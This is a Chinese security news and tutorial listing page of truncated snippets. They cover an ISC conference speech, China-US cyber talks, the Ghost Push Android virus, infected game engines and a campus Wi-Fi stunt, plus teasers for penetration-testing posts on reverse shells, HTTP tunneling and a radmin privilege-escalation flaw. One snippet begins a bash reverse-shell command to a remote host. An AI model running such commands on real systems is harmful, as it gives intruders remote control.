文章列表
ISC大会邬贺铨院士:互联网不是“法外之地”
近日,中国国家际席习近平习近平于完成了对美国的国国事访问,在为期四天的访问行程中,网络安全成为最受中美最为关注的议题之一。在今天上午举办的中国互联网安全大会暨中国互联网安全领袖峰会上,中国互联网安全大会名誉主席、中国工程院院士、中国互联网协会理事长邬贺铨指出,网络安全尤其重要,互
习近平四天四论互联网 网络安全议题成访美最大亮点
互联网大佬悉数参与中美互联网论坛、中美就打击网络犯罪建立高级别联合对话机制、就打击网络犯罪加强案件协查和信息分享……在中国国家主席习近平此次访美带来的大量成果清单中,最引人瞩目的当属中美在网络议题的突破性进展。当地时间9月23日,美国西雅图,中国国家主席习近平参观微软总部并与众科技
美国网络安全公司号称通过社工发现中国军方黑客
美国网络安全公司ThreatConnect和咨询公司DGI共同发表的一份报告称:一个名叫葛星(译名)的黑客身份露出水面,而他隶属于解放军78020部队,通过葛星,专家找到了78020部队与一个名为Naikon黑客组织之间的关系。葛星何许人?《华尔街日报》报导说,明面上葛星是中国成都军区78020部队的一名泰国政治研
安卓手机出现新病毒 杀不死的“幽灵推”
猎豹移动安全实验室发布紧急安全警报,一个名为“幽灵推(Ghost Push)的病毒感染了全球大量安卓手机。单单猎豹移动的统计,每日就有超过60万台手机中毒,预计真实受害用户应更多。受害用户主要集中在美国、印度、中国、墨西哥等,其中中国的云南、广东等省受害严重。 据猎豹移动安全实验室分析,全球
Web渗透中的反弹Shell与端口转发的奇淫技巧
转自:https://www.91ri.org/9367.html0x00 前言在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结.0x01 反弹shell1) Bash部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口bash -i >& /dev/tcp/x
rsync的几则tips
转自:http://phpsec.sinaapp.com/?p=245关于rsyncrsync(remote synchronize)——Linux下实现远程同步功能的软件,能同步更新两处计算机的文件及目录。在同步文件时,可以保持源文件的权限、时间、软硬链接等附加信息。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员;而开发人
tunna工具使用实例
转自:http://drops.wooyun.org/tools/650原理:就是个HTTP tunneling工具+-------------------------------------------+ +-------------------------------------------+| Local Host | | Remote Host
游戏引擎被曝感染病毒 与苹果染毒原理相同
苹果开发工具“染毒”事件尚未完全平息,盘古团队22日凌晨爆料称,目前已经有证据证明一些游戏引擎的下载地址也被感染病毒,例如Unity和Cocos2d-x,并且这些引擎的安卓版也被感染病毒。盘古团队表示,此次游戏引擎感染与苹果后门漏洞原理相同,后经证实是同一个人制造并传播。乌云知识库平台也于凌晨发
radmin hash提权漏洞
radmin是平时在windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等特性。不过老版本的radmin server2.X、radmin server3.0都存在一个“致命”
东大校园无线网全线被黑 原来是“白客社团”的招人广告
“看我们是如何黑掉seu-wlan的……”昨天中午,东南大学九龙湖校区上演“百团大战”,近130个社团招揽新生。走在大学生活动中心附近,不少同学用手机登录校园无线网后,惊讶发现收到了一封来自“黑客”的信,他们欢乐留言:“对网络安全(你懂的)感兴趣的同学快快联系我们吧。”虚惊一场!原来这是东
